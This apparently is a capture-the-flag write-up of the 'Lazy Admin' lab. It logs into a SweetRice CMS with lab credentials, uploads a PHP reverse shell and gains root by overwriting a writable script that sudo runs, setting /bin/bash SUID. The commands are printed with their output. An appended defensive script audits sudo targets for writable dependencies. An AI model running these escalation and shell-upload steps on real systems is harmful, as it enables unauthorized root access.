Lazy Admin
SweetRice
- SweetRice Login Portal: [IP:80/content/as]
- We can use the previously found credentials from the SQL backup to log in: manager:Password123
We can upload the Reverse Shell using the ADS or MEDIA CENTER panel.
- [1]. Uploading using ADS our Reverse Shell will be Located at: [IP:80/content/inc/ads]
- [1]. Uploading using MEDIA CENTER our Reverse Shell will be Located at: [IP:80/content/attachment]
- Uploading the Reverse Shell using MEDIA CENTER
- The Reverse Shell was successfully uploaded to: [IP:80/content/attachment]
[ICO] Name Last modified Size Description
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[PARENTDIR] Parent Directory -
[ ] php-reverse-shell.phtml 2022-10-07 10:03 5.4K
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Privilege Escalation
- We can catch the Reverse Shell using netcat
www-data@THM-Chal /$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- The user www-data can run [/usr/bin/perl /home/itguy/backup.pl] with ROOT privileges.
- backup.pl executes a script located at /etc/copy.sh. We have WRITE permissions on the script.
www-data@THM-Chal /$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal /$ ls -l /home/
drwxr-xr-x 18 itguy itguy 4096 Nov 30 2019 itguy
www-data@THM-Chal /$ ls -l /home/itguy/
...
-rw-r--r-x 1 root root 47 Nov 29 2019 backup.pl
...
www-data@THM-Chal /$ cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
- We move into the /tmp directory and run the following:
www-data@THM-Chal tmp$ echo "chmod +s /bin/bash" > SUID.sh
www-data@THM-Chal tmp$ echo "sh /tmp/SUID.sh" > /etc/copy.sh
www-data@THM-Chal tmp$ sudo /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal tmp$ /bin/bash -p
www-data@THM-Chal tmp$ id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
www-data@THM-Chal tmp$ whoami
root
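
The escalation above works because a script that sudoers runs as root calls a file an unprivileged user can modify. The following is an added example, not part of the original writeup, showing how an administrator could audit such a sudo target and the files it references. The function names, the OWNER_OK variable and the temporary fixture are assumptions of this sketch.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a script that sudoers
# lets an unprivileged user run as root, plus the files that script calls.
# OWNER_OK is an assumption of this sketch: one extra uid accepted as a
# trusted owner besides root, so the demo also works without root.
OWNER_OK=${OWNER_OK:-0}

# Print PATH if it is group/world-writable or owned by an untrusted uid.
# Checks the file itself (symlinks followed), not its parent directories.
report_if_unsafe() {
    [ -e "$1" ] || return 0
    find -H "$1" -prune \( \( ! -user 0 ! -user "$OWNER_OK" \) \
        -o -perm -0020 -o -perm -0002 \) -print
}

# Absolute paths mentioned in a script (interpreter line, system() arguments).
# Plain pattern match: paths assembled at run time are not seen.
referenced_paths() {
    grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u
}

# audit_root_script SCRIPT: one line per finding, no output when clean.
audit_root_script() {
    report_if_unsafe "$1" | sed 's/^/UNSAFE script: /'
    referenced_paths "$1" | while IFS= read -r p; do
        report_if_unsafe "$p" | sed 's/^/UNSAFE dependency: /'
    done
    return 0
}

# Constructed fixture mirroring the page: backup.pl calls a copy.sh that
# any user can write to. Pass "fixed" to build the corrected layout instead.
demo() {
    d=$(mktemp -d) || return 1
    printf '#!/usr/bin/perl\nsystem("sh", "%s/copy.sh");\n' "$d" > "$d/backup.pl"
    echo 'echo backup' > "$d/copy.sh"
    chmod 755 "$d/backup.pl"
    if [ "${1:-}" = "fixed" ]; then chmod 755 "$d/copy.sh"; else chmod 777 "$d/copy.sh"; fi
    OWNER_OK=$(id -u)
    audit_root_script "$d/backup.pl"
    rm -rf "$d"
}
```

On a real host, run `audit_root_script` as root against each script named in a NOPASSWD sudoers rule, leaving OWNER_OK at its default so only root-owned files pass.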